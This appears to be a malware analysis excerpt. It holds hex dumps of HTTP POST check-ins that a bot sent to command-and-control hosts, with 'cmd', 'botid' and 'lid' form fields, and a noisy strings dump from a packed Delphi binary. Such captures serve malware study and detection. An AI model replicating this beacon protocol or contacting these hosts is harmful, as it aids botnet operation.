0x00000020 (00032)   7a7a6a2e 636f6d0d 0a557365 722d4167   zzj.com..User-Ag
0x00000030 (00048)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000040 (00064)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000050 (00080)   49452037 2e303b20 2e4e4554 342e3045   IE 7.0; .NET4.0E
0x00000060 (00096)   3b204d65 64696120 43656e74 65722050   ; Media Center P
0x00000070 (00112)   4320362e 303b204d 41534529 0d0a436f   C 6.0; MASE)..Co
0x00000080 (00128)   6e74656e 742d5479 70653a20 6d756c74   ntent-Type: mult
0x00000090 (00144)   69706172 742f666f 726d2d64 6174613b   ipart/form-data;
0x000000a0 (00160)   20626f75 6e646172 793d6657 64765954    boundary=fWdvYT
0x000000b0 (00176)   4a4c6778 66734565 75426343 46430d0a   JLgxfsEeuBcCFC..
0x000000c0 (00192)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000d0 (00208)   3130300d 0a416363 6570742d 4c616e67   100..Accept-Lang
0x000000e0 (00224)   75616765 3a20656e 2d75730d 0a416363   uage: en-us..Acc
0x000000f0 (00240)   6570743a 20746578 742f6874 6d6c2c20   ept: text/html, 
0x00000100 (00256)   6170706c 69636174 696f6e2f 786d6c3b   application/xml;
0x00000110 (00272)   713d302e 392c2061 70706c69 63617469   q=0.9, applicati
0x00000120 (00288)   6f6e2f78 68746d6c 2b786d6c 3b713d30   on/xhtml+xml;q=0
0x00000130 (00304)   2e392c20 696d6167 652f706e 672c2069   .9, image/png, i
0x00000140 (00320)   6d616765 2f6a7065 672c2069 6d616765   mage/jpeg, image
0x00000150 (00336)   2f676966 2c20696d 6167652f 782d7862   /gif, image/x-xb
0x00000160 (00352)   69746d61 702c202a 5c2a3b71 3d302e31   itmap, *\*;q=0.1
0x00000170 (00368)   0d0a4163 63657074 2d436861 72736574   ..Accept-Charset
0x00000180 (00384)   3a207574 662d382c 20757466 2d31363b   : utf-8, utf-16;
0x00000190 (00400)   713d302e 362c202a 3b713d30 2e310d0a   q=0.6, *;q=0.1..
0x000001a0 (00416)   50726167 6d613a20 6e6f2d63 61636865   Pragma: no-cache
0x000001b0 (00432)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000001c0 (00448)   6f73650d 0a0d0a2d 2d665764 7659544a   ose....--fWdvYTJ
0x000001d0 (00464)   4c677866 73456575 42634346 430d0a43   LgxfsEeuBcCFC..C
0x000001e0 (00480)   6f6e7465 6e742d44 6973706f 73697469   ontent-Dispositi
0x000001f0 (00496)   6f6e3a20 666f726d 2d646174 613b206e   on: form-data; n
0x00000200 (00512)   616d653d 22636d64 220d0a0d 0a63720d   ame="cmd"....cr.
0x00000210 (00528)   0a2d2d66 57647659 544a4c67 78667345   .--fWdvYTJLgxfsE
0x00000220 (00544)   65754263 4346432d 2d0d0a74 2d446973   euBcCFC--..t-Dis
0x00000230 (00560)   706f7369 74696f6e 3a20666f 726d2d64   position: form-d
0x00000240 (00576)   6174613b 206e616d 653d2262 6f746964   ata; name="botid
0x00000250 (00592)   220d0a0d 0a433035 39393030 41313239   "....C059900A129
0x00000260 (00608)   34440d0a 2d2d4a6e 51705365 6c717876   4D..--JnQpSelqxv
0x00000270 (00624)   63694856 6e754377 674f0d0a 436f6e74   ciHVnuCwgO..Cont
0x00000280 (00640)   656e742d 44697370 6f736974 696f6e3a   ent-Disposition:
0x00000290 (00656)   20666f72 6d2d6461 74613b20 6e616d65    form-data; name
0x000002a0 (00672)   3d226c69 64220d0a 0d0a300d 0a2d2d4a   ="lid"....0..--J
0x000002b0 (00688)   6e517053 656c7178 76636948 566e7543   nQpSelqxvciHVnuC
0x000002c0 (00704)   77674f2d 2d0d0a                       wgO--..

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a486f73 743a2065 72767176 656b6e7a   .Host: ervqveknz
0x00000020 (00032)   712e636f 6d0d0a55 7365722d 4167656e   q.com..User-Agen
0x00000030 (00048)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000040 (00064)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000050 (00080)   20372e30 3b202e4e 4554342e 30453b20    7.0; .NET4.0E; 
0x00000060 (00096)   4d656469 61204365 6e746572 20504320   Media Center PC 
0x00000070 (00112)   362e303b 204d4153 45290d0a 436f6e74   6.0; MASE)..Cont
0x00000080 (00128)   656e742d 54797065 3a206d75 6c746970   ent-Type: multip
0x00000090 (00144)   6172742f 666f726d 2d646174 613b2062   art/form-data; b
0x000000a0 (00160)   6f756e64 6172793d 66576476 59544a4c   oundary=fWdvYTJL
0x000000b0 (00176)   67786673 45657542 63434643 0d0a436f   gxfsEeuBcCFC..Co
0x000000c0 (00192)   6e74656e 742d4c65 6e677468 3a203130   ntent-Length: 10
0x000000d0 (00208)   300d0a41 63636570 742d4c61 6e677561   0..Accept-Langua
0x000000e0 (00224)   67653a20 656e2d75 730d0a41 63636570   ge: en-us..Accep
0x000000f0 (00240)   743a2074 6578742f 68746d6c 2c206170   t: text/html, ap
0x00000100 (00256)   706c6963 6174696f 6e2f786d 6c3b713d   plication/xml;q=
0x00000110 (00272)   302e392c 20617070 6c696361 74696f6e   0.9, application
0x00000120 (00288)   2f786874 6d6c2b78 6d6c3b71 3d302e39   /xhtml+xml;q=0.9
0x00000130 (00304)   2c20696d 6167652f 706e672c 20696d61   , image/png, ima
0x00000140 (00320)   67652f6a 7065672c 20696d61 67652f67   ge/jpeg, image/g
0x00000150 (00336)   69662c20 696d6167 652f782d 78626974   if, image/x-xbit
0x00000160 (00352)   6d61702c 202a5c2a 3b713d30 2e310d0a   map, *\*;q=0.1..
0x00000170 (00368)   41636365 70742d43 68617273 65743a20   Accept-Charset: 
0x00000180 (00384)   7574662d 382c2075 74662d31 363b713d   utf-8, utf-16;q=
0x00000190 (00400)   302e362c 202a3b71 3d302e31 0d0a5072   0.6, *;q=0.1..Pr
0x000001a0 (00416)   61676d61 3a206e6f 2d636163 68650d0a   agma: no-cache..
0x000001b0 (00432)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x000001c0 (00448)   650d0a0d 0a2d2d66 57647659 544a4c67   e....--fWdvYTJLg
0x000001d0 (00464)   78667345 65754263 4346430d 0a436f6e   xfsEeuBcCFC..Con
0x000001e0 (00480)   74656e74 2d446973 706f7369 74696f6e   tent-Disposition
0x000001f0 (00496)   3a20666f 726d2d64 6174613b 206e616d   : form-data; nam
0x00000200 (00512)   653d2263 6d64220d 0a0d0a63 720d0a2d   e="cmd"....cr..-
0x00000210 (00528)   2d665764 7659544a 4c677866 73456575   -fWdvYTJLgxfsEeu
0x00000220 (00544)   42634346 432d2d0d 0a                  BcCFC--..

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a486f73 743a2062 7563656c 736c6d70   .Host: bucelslmp
0x00000020 (00032)   7779616a 7a6c6775 69732e63 6f6d0d0a   wyajzlguis.com..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000050 (00080)   626c653b 204d5349 4520372e 303b202e   ble; MSIE 7.0; .
0x00000060 (00096)   4e455434 2e30453b 204d6564 69612043   NET4.0E; Media C
0x00000070 (00112)   656e7465 72205043 20362e30 3b204d41   enter PC 6.0; MA
0x00000080 (00128)   5345290d 0a436f6e 74656e74 2d547970   SE)..Content-Typ
0x00000090 (00144)   653a206d 756c7469 70617274 2f666f72   e: multipart/for
0x000000a0 (00160)   6d2d6461 74613b20 626f756e 64617279   m-data; boundary
0x000000b0 (00176)   3d6f5848 6b437961 76485352 586b4e41   =oXHkCyavHSRXkNA
0x000000c0 (00192)   6d624271 500d0a43 6f6e7465 6e742d4c   mbBqP..Content-L
0x000000d0 (00208)   656e6774 683a2031 30300d0a 41636365   ength: 100..Acce
0x000000e0 (00224)   70742d4c 616e6775 6167653a 20656e2d   pt-Language: en-
0x000000f0 (00240)   75730d0a 41636365 70743a20 74657874   us..Accept: text
0x00000100 (00256)   2f68746d 6c2c2061 70706c69 63617469   /html, applicati
0x00000110 (00272)   6f6e2f78 6d6c3b71 3d302e39 2c206170   on/xml;q=0.9, ap
0x00000120 (00288)   706c6963 6174696f 6e2f7868 746d6c2b   plication/xhtml+
0x00000130 (00304)   786d6c3b 713d302e 392c2069 6d616765   xml;q=0.9, image
0x00000140 (00320)   2f706e67 2c20696d 6167652f 6a706567   /png, image/jpeg
0x00000150 (00336)   2c20696d 6167652f 6769662c 20696d61   , image/gif, ima
0x00000160 (00352)   67652f78 2d786269 746d6170 2c202a5c   ge/x-xbitmap, *\
0x00000170 (00368)   2a3b713d 302e310d 0a416363 6570742d   *;q=0.1..Accept-
0x00000180 (00384)   43686172 7365743a 20757466 2d382c20   Charset: utf-8, 
0x00000190 (00400)   7574662d 31363b71 3d302e36 2c202a3b   utf-16;q=0.6, *;
0x000001a0 (00416)   713d302e 310d0a50 7261676d 613a206e   q=0.1..Pragma: n
0x000001b0 (00432)   6f2d6361 6368650d 0a436f6e 6e656374   o-cache..Connect
0x000001c0 (00448)   696f6e3a 20636c6f 73650d0a 0d0a2d2d   ion: close....--
0x000001d0 (00464)   6f58486b 43796176 48535258 6b4e416d   oXHkCyavHSRXkNAm
0x000001e0 (00480)   62427150 0d0a436f 6e74656e 742d4469   bBqP..Content-Di
0x000001f0 (00496)   73706f73 6974696f 6e3a2066 6f726d2d   sposition: form-
0x00000200 (00512)   64617461 3b206e61 6d653d22 636d6422   data; name="cmd"
0x00000210 (00528)   0d0a0d0a 63720d0a 2d2d6f58 486b4379   ....cr..--oXHkCy
0x00000220 (00544)   61764853 52586b4e 416d6242 71502d2d   avHSRXkNAmbBqP--
0x00000230 (00560)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a486f73 743a2033 312e3230 372e362e   .Host: 31.207.6.
0x00000020 (00032)   3138390d 0a557365 722d4167 656e743a   189..User-Agent:
0x00000030 (00048)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000040 (00064)   6d706174 69626c65 3b204d53 49452037   mpatible; MSIE 7
0x00000050 (00080)   2e303b20 2e4e4554 342e3045 3b204d65   .0; .NET4.0E; Me
0x00000060 (00096)   64696120 43656e74 65722050 4320362e   dia Center PC 6.
0x00000070 (00112)   303b204d 41534529 0d0a436f 6e74656e   0; MASE)..Conten
0x00000080 (00128)   742d5479 70653a20 6d756c74 69706172   t-Type: multipar
0x00000090 (00144)   742f666f 726d2d64 6174613b 20626f75   t/form-data; bou
0x000000a0 (00160)   6e646172 793d6341 4c797847 6d4e6c59   ndary=cALyxGmNlY
0x000000b0 (00176)   46747970 624d7155 4b4b0d0a 436f6e74   FtypbMqUKK..Cont
0x000000c0 (00192)   656e742d 4c656e67 74683a20 3236300d   ent-Length: 260.
0x000000d0 (00208)   0a416363 6570742d 4c616e67 75616765   .Accept-Language
0x000000e0 (00224)   3a20656e 2d75730d 0a416363 6570743a   : en-us..Accept:
0x000000f0 (00240)   20746578 742f6874 6d6c2c20 6170706c    text/html, appl
0x00000100 (00256)   69636174 696f6e2f 786d6c3b 713d302e   ication/xml;q=0.
0x00000110 (00272)   392c2061 70706c69 63617469 6f6e2f78   9, application/x
0x00000120 (00288)   68746d6c 2b786d6c 3b713d30 2e392c20   html+xml;q=0.9, 
0x00000130 (00304)   696d6167 652f706e 672c2069 6d616765   image/png, image
0x00000140 (00320)   2f6a7065 672c2069 6d616765 2f676966   /jpeg, image/gif
0x00000150 (00336)   2c20696d 6167652f 782d7862 69746d61   , image/x-xbitma
0x00000160 (00352)   702c202a 5c2a3b71 3d302e31 0d0a4163   p, *\*;q=0.1..Ac
0x00000170 (00368)   63657074 2d436861 72736574 3a207574   cept-Charset: ut
0x00000180 (00384)   662d382c 20757466 2d31363b 713d302e   f-8, utf-16;q=0.
0x00000190 (00400)   362c202a 3b713d30 2e310d0a 50726167   6, *;q=0.1..Prag
0x000001a0 (00416)   6d613a20 6e6f2d63 61636865 0d0a436f   ma: no-cache..Co
0x000001b0 (00432)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000001c0 (00448)   0a0d0a2d 2d63414c 7978476d 4e6c5946   ...--cALyxGmNlYF
0x000001d0 (00464)   74797062 4d71554b 4b0d0a43 6f6e7465   typbMqUKK..Conte
0x000001e0 (00480)   6e742d44 6973706f 73697469 6f6e3a20   nt-Disposition: 
0x000001f0 (00496)   666f726d 2d646174 613b206e 616d653d   form-data; name=
0x00000200 (00512)   22636d64 220d0a0d 0a6c640d 0a2d2d63   "cmd"....ld..--c
0x00000210 (00528)   414c7978 476d4e6c 59467479 70624d71   ALyxGmNlYFtypbMq
0x00000220 (00544)   554b4b0d 0a436f6e 74656e74 2d446973   UKK..Content-Dis
0x00000230 (00560)   706f7369 74696f6e 3a20666f 726d2d64   position: form-d
0x00000240 (00576)   6174613b 206e616d 653d2262 6f746964   ata; name="botid
0x00000250 (00592)   220d0a0d 0a433035 39393030 41313239   "....C059900A129
0x00000260 (00608)   34440d0a 2d2d6341 4c797847 6d4e6c59   4D..--cALyxGmNlY
0x00000270 (00624)   46747970 624d7155 4b4b0d0a 436f6e74   FtypbMqUKK..Cont
0x00000280 (00640)   656e742d 44697370 6f736974 696f6e3a   ent-Disposition:
0x00000290 (00656)   20666f72 6d2d6461 74613b20 6e616d65    form-data; name
0x000002a0 (00672)   3d226c69 64220d0a 0d0a300d 0a2d2d63   ="lid"....0..--c
0x000002b0 (00688)   414c7978 476d4e6c 59467479 70624d71   ALyxGmNlYFtypbMq
0x000002c0 (00704)   554b4b2d 2d0d0a                       UKK--..


Strings
..
Z
.
:.\
.
.
@
..
..
!
.C
.
.X..
p
]
...
x$...
.
@.D7.<
.....
.
w
..
Z
.
:.\
.
.
@
..
..
!
.C
.
.X..
p
]
...
x$...
.
@.D7.<
.....

MIZALK
<-]\	^
'//#/	
"*(<">
$&$,(&
#%.)')&
	$&-[-
~,0}$"-|
01F52k
0~!1(% R
03760Ttq
0,'=3 u
0+<&5v<
% 06P/
08TD+B
* (0Ds^&0
0Hh"	 8
0:-|I0
0*L1im
0|m%33
0,NNNN($
0N|*x}&
"^*>0P6
0PxODA
|?0QNz
0,QUR=P-*r)`
~0?S;9+lf]
0)S"+	q
 0s!v3
0tq:PV7
`0T%R3,\p
;0u[4H-
#=0,UBU52w
(0}*'#UW
0"	w,9
"#0(_*Z
+~1"<"!_
1*/$'6%
1dz W{
~1ir#"R+(|
}1@}iY	
*,/'/1j
1loz8	w
1,N+LN8$&
-'<1R7
"1#R,m
*1&~*>v5
1Z,0w%
?1z	b4
2 ?:>0
2	0 +I
20	ORKr
+(21U6
/22DThreadA
$<2#5.
25kiU5%u
2>>6)3%8
|`2I 5)#%
2ILq-P]
2M>)5u
2N -T-!q
2'^',%_o
2}OS#=
2/P(W4P
2*PWf5b.Q$(
=2,*}q
2qS0y5,
2RjP(U
2"RrW _6
2S1)P?Q
2T/LL+
 2;%<t>N+)
$"$!>2ts
2-!u0<d!1
2uI>)}
2	%V#o
;2w;;thsz
2ytpQd
"2?<zR
^3*\ +
+30*2/t7i'(
307u~*~),
!3^0$\y
/3%1P)j+
"),/?!33qI)4\6
%*35MH`
(38>&6&s
$\3BT3&
}3&F7SUv
=,3WPJV
/	3-\WSO
3+W?&u)0
"-4=0P
41..US>
"4<.]3
/4;97r
4=+bb-y
4Bic(c-
+"4]BNxV4X
<4<DLT
4H&<L;
4K	s60,s
4lRNH1
%4M2QK	%x
4M$$((,,h
<4*!OI=Q
	=4?,p)
4Q2x-t
4R2$"*
4rs0--&
]$4R"tA-v%|1ilDu(\3
(4R,Wc
4u 1G4
4uqt0#A|!
4}vBa3l
,/>4'w
51<Et:<et
52201>r 
533t_"
'	?53W
^#5(6:
!<;56*+
56	y3	
5)}($7^R,)2"
5 &b/=
5bT\ x
@5iMxsA
*5l. s
5O/kAn
5	PvuJT
5Q5#0Q
5Q6m%+t
.5. r-
,5S>%Q
5(T*#(
<]5T5</
5V0w~5
}5W	$ 
5/.W=$%$
.5(W=0
,	5 w+*4
5WQ7uV
5X1q[e
+5z%V;
 _-/&_!6
,6)".>
6<03"P";
^^6)0-v
<+_/61,VI7>5-
,6* +,!4
'6"@4.
 &	"/64A
66#~/#
68^@<j5&(0&*
68[N,A*C
6%D+}(
 6)"d3k>
'6\dU 
6F	f4^
6>fJf7h
6|[I^!2
?6*I7W5
6jZ#@'
(6,P)Q
+6rx,u?
*?6T&2H
*6T7wtb7?V
6&T~8I
6TP3up
6tzE32A'%
6!+V'w
6`)w,$
6@_w >
~6*x3YMv
,7^\('
+	~$<7
7|(>,+
,7#4)1
76@`F2r
7B29'g
7B<4+2u
7F&%+%"!m5d&
,7f Pnr~|L
.7h*rf7m
7I&B7&.
7+I%T&
<_%7Ku
7\L(5Q
7~nS&S)
&7P0u.
%-7Pn7
7PYF;w
7|.UD,.
!.7;Vx
7,-	<we
\8> aGhX
\8*GH/
8	M6/,`
}8N4Q[
8~*PRf
8:	ssRegul6
8]"t/^,P
	8U~|<E=
8<(V)M>^./u
.8;,]x
)94v)Q4T#
98aP+	F22
.9f$dg
(9Ftru7#S'$
9H9`7E
9pVeM}
9}Qs=m
9	Qx=!
9yH\PX
A2#0u0
A7A+iU
A7b!%a=A`
:AAHVB
''''`abc''''defg''''hijk$/:'l
@aBp)`_
a;Bx`,
a>d&^;
AdH pXD
advapi32.dll
;ae[/_
agdW~i
ag}O4h
A_H-t3
ak`,3GPs
aKJWTJVu/s]CMPU]xIX
aK;~ty
alV4r*
~ AMPM
&([an	
A-QQzf 
ARE\Borland\Delphi\RTL
Asf:!;d
=a$Sr(E
!At/CU
Axh"r$8
?]ay	\M
#$-B/$
?b*0'O
_b2M.4
 b3'01
B3&9,5%
B/^56P	R.
B,`?5p
@B64@ 
B&?70-(
B7FH(=41B
(B&8B 
bdLeftToR
*b"D?:X6
'%bGNnd^~AU
B)>H%}O{6
b'*h^'+T
.bIpm6=(K/T
b,L~<G6
BLHQpd
&BN$`$
:BN<i^
board Layouk
Boolean
bq*9ak
bQEtJPDU@rX
BS8tdJ
BThumb.
BV(	$P
BVPFR\dv]K\JRc\V[DKFQ
bwZX	>
;C0t:>@
C8Gwl`W
c#AO`-
C/BALT
C ;CCJ
C)"deW
~C)From
ChZset
cK><tq b-]7
.c ^LYPw 
comctl32.dll
CP;t;V
c.tS(@
cV"R!=r
cxlu$I
c/zZ:-
-><*	*D
'''@D|`
"$_^D><
D12OI|w
=d.1\W=
D3	-+'N
D^4K15
d.50 !
d5%	IK
D 9^Im%
d\.-a:
+=?DaE
DataA|C
db7'fU
&dB&DHL
dDINGXX
Dg7i,L
dHnw0X0
d}i		(02%5
{dIo{|+
/DISPL
DK@"CQ0t*H
@)Dl'"
dN16*36
d"&NF@
doeFvIFj
% dqZ4
,#!d'$RU
dWlo3/
dx+-(/
Dx\;Ch&
	, ]E2
EClat\
)ed45y
EDivByZero
eg7@PSe
Eg\FH54F
EL!Y@T
EMfP1%
EOutOfMemjyX.
EO`&z	
ES2$`jZ
) ExDY
ExitProcess
_	?,F%
"	F^&'3
F=3"45
]F6,S&
$<f)-	7
f*7\.=M
F8ZqW`:
`",fag
^fan^	
fc<t3,?
.FDiag
fFTXQQ
FH!FL	k
f`IPKOhf
F:iZet
F-(<-j(
fkUyZZ
 F%K_w"
Fmif?K
F+NZDK
FoNe,$f;hhl
	fpDefa
f#P^'nn
f+PTmY(l
FPUMaskVa#w
F,r,5M
FuchsiaAqua
fv0idOp
,>)'f=v_T`	6Aw!
_F_W1}q#]#=
$fW8vGI
"$G+)%
>)&g}1
G1]!gj5
"G4@cH
GB2312
gBue.*7a
gdi32.dll
gel` MSWHEEL
GetLongPathNameA'O
GetProcAddress
GhNewU
ghw%=!X
gImeNV
GlQEGE
[gow})
GqNZTUWVS;8
GREEKGA
]G_-Rf;` 
G@ t;H}
GUID*'
g,]	W,
GWPZ }	
%(-h. 
/H',2q
h3=W) 
*=H<7(M5
(*HA>V
 ;h}'&<e
h	Excep
!=hGc0Q
HGHIJKLMNOJ
- ;Hh|"
-*-+hI,)
} *\Hi
<h,Iga
%hL`N*,N
Hl+T$@p
HotkeysK0
_how+y
hp.07i
Hpa"`F
hP}*%n
h^Ppn"
|Hr6H*f*(^!RP'SA%
hS/7?M
'HSplitle
	[HTOL<g
H*TYnd\
hun,!?
HXP m]
"%\I!*
# I#%!#
I]/%^#
i04#4E
i<1!WT2
%<i3"=i
I|$"6D(
I6MS<(;
i.8H61
^IA8-D
iDt}w=
IDY@xofT{
Ignore
iJ;xh(C
ILlzoa
ImageList_Add
INFNAN
Integer
Inverflow0
InVK>7
\iO=?n(
i^_>P@
IsEqualGUID
IT	lU,
,It<TK
itWa~N
IUnknown
IVT'&=ps
iW[E\F@
I`z(	1k
(\~>-	j1
J1234567890ABCM
<((j1g
!J2/25
j/(!.6
!J6/$ 
 ja6g/
jFOpmv}
?j]"H"
Jhplayws
ji_(>r
@jj:BG
"JjDLL
)>	jLLn
J)lP'p
&JmiU]
j#p!L/
|*jQjG
>j#R,]
jT,-<!"	
&@jT#x
jxg=	[t
JZh"6DOn
/[K'`!
!K0yr}
'K2>w2
k9m@^.
!"k(aA
kEh>j`
KERNEL32.DLL
~k>#".f3
%KglCl
\k GOd
K@H@Ay#
K_LINES/gmi
KMGuha
KNKfvdnR"3f
k	Od"C(
k|=pg[; |S
?K^"R;
krk\Kl&G
kT&#%'
kt&"1()/
;]Kt$P
K~ TV5`
*-.KT!x
()+KV*
l1O"U(<#
>L2	4uP
L	4&2Hf
.'L!7$5"u
L	_	=8B
lCBNTl
lDx8T)
LimegY
Ll(eB"
l+ lFp
LoadLibraryA
LoadLibraryu
L<prpS
>L!P.Y
*LQ\yRZwS
L>~t-TU(
>L'-u)S
L.=wv)
`LXMuF^Z@
'&)	\M
m1~`.G
M3R2"2k
M+4!&)
m@$'>5!,
m))%5(jv~kw
_MAINI
M#C*KJ&
MD_5H;
M	=D;C
M*f;;:
*MhI7]
_}m+ix
MIZALK
m^_+.k
m,O)]?/Ap
MS Sans
M\UL6,
m& VZfZce8
!MW'q7/
.mz#]Br
N0>da;
/N\4;~
N$6h%~BA
NDGX"'X#
\ndlt|
ndOf[R
N(;F,t
n.@H,?v
Nk@dWHUAoLQFvCgTZQ]
n(luR`i
NNNN|xtpNNNNlh
|nPa[I]
nRadio
nr)M%{
,=nu,Z	F
nw{(()@-3$-	*-&*$
|N,WvL
_~o1Z!
"O ,_2
o)2n%6`J
`!O7K8Hb7
O{EZ97	
OF;MbY
oI\;J(u
okernel32.dll
ole32.dll
oleaut32.dll
o lU*<.3
ook?sH
oo;^XTt
or1%&tu+Nj-*<
oross&%
ORT_(_.SC
.os3PVJ$
o!'S5*	
OSixiH
!(OTop
"o>^#TS"
ov>1(2
Ov >,4*	
OW]*5)
~%O$"xrv
p'^1i5
?P%$1v
	 P?3o"
P>4U+vj
 p6p?qD
}p6?UT_
	p'&^7*
p'7'P7O8
>P90.=8V
!pA;?\
P&>B=-
pC^;u"
}p%D)E
}<pe!9
'p+%fd
p*&I\/%n
piPJbDf\
P$K7	q
PLrrrrHD@<rrrr840,
\PNKM3*
P)OAC'
Portions Copyright (c) 1983,9q
POUhBP
#\!#PP>\
	>PPkh
%pPLNrl
#pp)&m0
''''pqrs''''tuvw''''xyz{''''|}~
p='q`y
;pqYAhH	
P /ST>
PT@u/]_]wQ
\P|u,'
PV:8lo
pv.Itp$KTK^Kp
PVU.kn
(+'pw3$
P$W"!W
PX2X0z
,$p\&y/
\|Q0R:
Q1r3!7M"?U
q'1.R+P
q<6!P%
q,<7P%-1$
%>Q9TyLyn[n{N
Q9.%UA
qcoOSI
.	&q>D|,
qd%3<I
{Q;E4`
QEU7T&4
Q{/*f	
Q]f"I] ,
QHDB2T.^
*QI	M*&p otw
^qjygu
Q)Q&8 
QS<$P<
Qt7MUV!R
QT^ *r
|Q	+u	\
,qV-6#
 Q%vpS
qvXD^/*V
qW3><w
q|w|.4! 
q*wu} M
Q#w"<~v
r/01$/
R0U=-;
r3=nw,
r"4)% >
R4V]%]n
r#5= `
R5up/kr3
r)=*-6
R6f}/.
._~Range
	rb817
>RbtH'&
Rebuil
RegCloseKey
rfaced
?~RIZ*
RKwi_y
R"L u%
[RN=GT
Rn~N 11'
%_ROLL
R[R)Q)
rrr($ 
R>s{iG
r%T4n(
RTf*h;
rt&I 	
?R U1	
!RVI%^
rv!tU6
RXTfLU
RyfV"N
(&"=S#
S2 X&7Aq
>S.4}	,5
"S>6n.
s7t{an
SaveDC
SdoisV.
SE;:[L
SI_CHARSETDEFAULT5H
s)>@mo
/()SO-
Software
$ S@Oy
sPP`+J<
SQLWaQ!
sq *#VQO
s%R55d
S)r/9w?*
s<RR"V7
'sS4?!
ssP+th
S)s+UQ7
]	ST>$
S<;t~aU p
Std&ns
STf]!.s)
String
@STUVWXYZ
S)ur& 
 $SvcG
SvkC?@mCQ
S?vrT)
?s,VV25
S+v*X@
s$]W$k
Sx%4l"
S<xd4NZ
Sx:#(j
SYMBOLc
Sync ^izBm
{:Syp'
+SYxj"
-$szdP
\t0=T2T
t&<0t%<.t,<,t3
`;^t-2
?T43bV
T5^lQ,
t5	s5U
/T63j0/'
	t7KDL 
_T/ 7w
 _t8^&
&$"T^9
t#;A8tiOD
TAdXnc0
TBiDiModYB
TBjic^
t_C!FC
T;C`u'7
TCu`om
TdfU.Hn
+tf$xtaXt\W
	Th^b0
This program must be run under Win32
t%h.KSPM
{~t[i"drxRu
tifyEv
t#IPF`E
tJut:L
*t	K{j
|tkn. (
T<L(#n
^.TM2N
/$TN\ 
TObject
,\toN_l
tPitch
TPropFixup
T>&q']%
T<QuV/m6)"
TQ(#.V5
,	tr|~
t"r`WK
;tS14^
t$<"t *
T>)U/.
)TU-2)
TURK*H
=Tv+5|
t<v/S+<
tw $=^
 T&X^+
TY6K:S
U00XP,
*!u&/>#.-1W
U4 CMg
+<'U5OT
U6. !&f\MiK,)ZD
<u6q|u
:U$*6U
U/7J'2$
u)Br$0
>*U	!D
uFw@w]	
|@ug5@
_Uh9(,
Uhl"J1d
\uI6$0v
U%I&H%(R<\
U]jhq@
U,!-l{
"U#*-p
upV!l(x
uRaA#v
user32.dll
'U>>V6
uw(2dT
uw`5\A
uW$>kus
"U*	=xR
U>z5Q1
%!**v"
+:,$v	
	'!?&v
<=V	$'#
,"{V `
V0b+U6
V49Hnd&&+
`V4jPi
*.'v4sM
v"5%|&
~&Va-R
VariantClear
VBf'(b<	_=$5U
~vclt\3P
vC/p<4("
)Vh pP
_V-i5^
VirtualAlloc
VirtualFree
VirtualProtect
'+*vJ&!?
V(,mBOn$
V,nvq\	
vNzS@%,
V?#o:(Z:
&<,v*p
VP3+Dy
-+.V-Q
\V#<R.
VrvS..R
	vRW/ 5<1$#V&;$v
V><+st+'7
vTPpt4
v<t\/(*pV7
V/v4Qn,7T
 v|w#+
VW%".2>k
VW\74P
!VW.I\w
VWvpW}
V$w$w-"
VxpPz&
vy o50v'
	w/*	,
W0p4#6W
W0yed* 
w1(QdZ
.w>#2+
w(!323
W37r8 
W)5"_O+
W&619 1k
w$+"6M+
W<6\W]p
W:71-7
wDiskF
wEHeap]
WF@u"F
wHuw$06
wH+V1-p
	W!"?*i
WINNLS
`WL5;0
wm3ygh
W N%+5PT
w!OH )P
"w?] }),PI=
*W?'	PV
wqfKM 6
wQ!|Hp
W/QR-t0.
wt1\6p)
($W.t3
w.&t4	PS
(WT&t8$~
?}@W^TUF>rCXBYT
W|$U.1L*u
W&u2F4o2|
<w/U^5
wV=$.{
;!.WVh0U
w^WnIM
wXhw(1 
x&<}>(
}'X">0
X-)1+UI
X =.)3S(u
x4PPFqf
x5~+6qt
>x[7N5'
&*>x,EB
;,x/F&
Xf5ub4
>X[H(E
X*|IAg
X#%"IP]H
Xir$+n
,x*<iV
XJGGL"R
XJVd%flv]1
xMZw;,]c
`\XNNNNTPLHNNNND@<8NNNN4
|xNNNNtplhNNNNd`\XNNNNTPLHNNNND@<8NNNN40,(NNNN$ 
xod1?O(7
XPTPSW
XQ~D;l(v
x*QK~-
!x!R,Z
.xsp4~>
 X&T^g
|xtNNNNplhdNNNN`\XTNNNNPLHDNNNN@<84NNNN0,($NNNN 
|''''xtpl''''hd`\''''XTPL''''HD@<''''840,''''($ 
Xumf&#
X'Word
yDH#n p
YF2rDHYR!
|YG(VR
'!yh7S
y _h@p
yjxROPE
yK%3/!
yOq!7<
\|YO v
;YP?Bd
+yr}		
YSU<HtH.'?
\&z+^_
:Z0Lch
Z2zj.U
z9U Dj^
ZcV]CXK
@]zJYAK{PRW\W7
zK^%lH
]zm/d/
'z|,P;
ZpM,,m
/Z_/sPS
"zs, V
ZUpc@h
z	"V6"\